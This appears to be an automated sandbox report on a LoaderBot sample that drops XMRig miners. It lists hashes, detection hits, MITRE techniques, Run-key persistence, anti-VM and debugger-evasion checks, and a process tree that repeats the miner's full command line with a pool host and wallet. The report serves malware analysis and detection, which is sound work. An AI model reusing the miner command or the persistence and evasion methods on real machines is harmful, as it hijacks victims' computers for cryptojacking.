loaderbot | db49ee22aaa915add5f012d2070d32ea2e50c2df78689754903a27430f22bf08

Analysis

max time kernel
150s
max time network
120s
platform
windows7_x64
resource
win7-20241023-en
resource tags

arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
submitted
07-01-2025 19:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
Size

5.1MB
MD5

76405f0aba384688fddaf31a294f88b8
SHA1

97ab2bdce4e1089dce058fbe38cd17fb6f11cc30
SHA256

db49ee22aaa915add5f012d2070d32ea2e50c2df78689754903a27430f22bf08
SHA512

e6e6a9f51f191682f5f4cdefb8d2a6cbb881d32c8ce18495fd0e4a79f3efdd2106f22d02de6ddcc59fde50a6dc55ee4c2312c21cededa8dcad65d4968e81a2af
SSDEEP

98304:q60IvDPNonUKTcfwgrhHwSY6wc7A5wmlcLnR7ck57kccPvJYq+U:q6tLSUacIIhHwS3weOjcjR4okc3BU

Score

10^/10

loaderbot xmrig discovery evasion loader miner persistence themida trojan

Malware Config

Signatures

LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
loader miner loaderbot
Loaderbot family
loaderbot
Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe

LoaderBot executable 2 IoCs

resource	yara_rule
behavioral1/memory/1372-9-0x0000000001280000-0x0000000001F16000-memory.dmp	loaderbot
behavioral1/memory/1372-10-0x0000000001280000-0x0000000001F16000-memory.dmp	loaderbot

XMRig Miner payload 32 IoCs

miner

resource	yara_rule
behavioral1/memory/2892-22-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2740-30-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1052-37-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1512-43-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/848-48-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2140-54-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/3036-60-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1876-66-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2196-71-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2440-76-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2540-81-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1360-86-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/308-91-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2636-96-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2468-101-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2172-106-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2688-112-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2556-117-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1872-122-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1720-127-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2364-132-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2516-137-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2688-142-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2792-147-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2008-152-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2456-157-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2120-163-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1652-168-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2244-173-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/340-178-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1928-183-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1856-188-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe

Executes dropped EXE 64 IoCs

pid	Process
2892	Driver.exe
2740	Driver.exe
1052	Driver.exe
1512	Driver.exe
848	Driver.exe
2140	Driver.exe
3036	Driver.exe
1876	Driver.exe
2196	Driver.exe
2440	Driver.exe
2540	Driver.exe
1360	Driver.exe
308	Driver.exe
2636	Driver.exe
2468	Driver.exe
2172	Driver.exe
2688	Driver.exe
2556	Driver.exe
1872	Driver.exe
1720	Driver.exe
2364	Driver.exe
2516	Driver.exe
2688	Driver.exe
2792	Driver.exe
2008	Driver.exe
2456	Driver.exe
2120	Driver.exe
1652	Driver.exe
2244	Driver.exe
340	Driver.exe
1928	Driver.exe
1856	Driver.exe
3052	Driver.exe
108	Driver.exe
1900	Driver.exe
864	Driver.exe
2416	Driver.exe
2168	Driver.exe
1792	Driver.exe
2752	Driver.exe
2688	Driver.exe
3024	Driver.exe
1916	Driver.exe
2968	Driver.exe
1808	Driver.exe
1668	Driver.exe
2368	Driver.exe
2352	Driver.exe
2164	Driver.exe
1612	Driver.exe
2040	Driver.exe
768	Driver.exe
3016	Driver.exe
1448	Driver.exe
3008	Driver.exe
2996	Driver.exe
2356	Driver.exe
2240	Driver.exe
2216	Driver.exe
2840	Driver.exe
1772	Driver.exe
2708	Driver.exe
2472	Driver.exe
2312	Driver.exe

Loads dropped DLL 1 IoCs

pid	Process
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/memory/1372-9-0x0000000001280000-0x0000000001F16000-memory.dmp	themida
behavioral1/memory/1372-10-0x0000000001280000-0x0000000001F16000-memory.dmp	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe"	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
4	iplogger.org
5	iplogger.org

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1372 wrote to memory of 2892	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	30
PID 1372 wrote to memory of 2892	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	30
PID 1372 wrote to memory of 2892	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	30
PID 1372 wrote to memory of 2892	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	30
PID 1372 wrote to memory of 2740	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	33
PID 1372 wrote to memory of 2740	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	33
PID 1372 wrote to memory of 2740	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	33
PID 1372 wrote to memory of 2740	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	33
PID 1372 wrote to memory of 1052	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	35
PID 1372 wrote to memory of 1052	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	35
PID 1372 wrote to memory of 1052	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	35
PID 1372 wrote to memory of 1052	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	35
PID 1372 wrote to memory of 1512	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	37
PID 1372 wrote to memory of 1512	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	37
PID 1372 wrote to memory of 1512	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	37
PID 1372 wrote to memory of 1512	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	37
PID 1372 wrote to memory of 848	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	40
PID 1372 wrote to memory of 848	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	40
PID 1372 wrote to memory of 848	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	40
PID 1372 wrote to memory of 848	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	40
PID 1372 wrote to memory of 2140	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	42
PID 1372 wrote to memory of 2140	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	42
PID 1372 wrote to memory of 2140	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	42
PID 1372 wrote to memory of 2140	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	42
PID 1372 wrote to memory of 3036	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	55
PID 1372 wrote to memory of 3036	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	55
PID 1372 wrote to memory of 3036	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	55
PID 1372 wrote to memory of 3036	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	55
PID 1372 wrote to memory of 1876	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	46
PID 1372 wrote to memory of 1876	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	46
PID 1372 wrote to memory of 1876	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	46
PID 1372 wrote to memory of 1876	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	46
PID 1372 wrote to memory of 2196	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	48
PID 1372 wrote to memory of 2196	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	48
PID 1372 wrote to memory of 2196	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	48
PID 1372 wrote to memory of 2196	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	48
PID 1372 wrote to memory of 2440	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	50
PID 1372 wrote to memory of 2440	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	50
PID 1372 wrote to memory of 2440	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	50
PID 1372 wrote to memory of 2440	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	50
PID 1372 wrote to memory of 2540	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	52
PID 1372 wrote to memory of 2540	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	52
PID 1372 wrote to memory of 2540	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	52
PID 1372 wrote to memory of 2540	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	52
PID 1372 wrote to memory of 1360	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	54
PID 1372 wrote to memory of 1360	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	54
PID 1372 wrote to memory of 1360	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	54
PID 1372 wrote to memory of 1360	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	54
PID 1372 wrote to memory of 308	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	56
PID 1372 wrote to memory of 308	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	56
PID 1372 wrote to memory of 308	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	56
PID 1372 wrote to memory of 308	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	56
PID 1372 wrote to memory of 2636	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	58
PID 1372 wrote to memory of 2636	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	58
PID 1372 wrote to memory of 2636	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	58
PID 1372 wrote to memory of 2636	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	58
PID 1372 wrote to memory of 2468	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	60
PID 1372 wrote to memory of 2468	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	60
PID 1372 wrote to memory of 2468	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	60
PID 1372 wrote to memory of 2468	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	60
PID 1372 wrote to memory of 2172	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	62
PID 1372 wrote to memory of 2172	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	62
PID 1372 wrote to memory of 2172	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	62
PID 1372 wrote to memory of 2172	1372	JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe	62

C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_76405f0aba384688fddaf31a294f88b8.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Drops startup file
- Loads dropped DLL
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1372
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2892
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2740
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:1052
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:1512
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:848
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2140
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:3036
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:1876
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2196
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2440
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2540
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:1360
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:308
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2636
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2468
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2172
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2688
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2556
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:1872
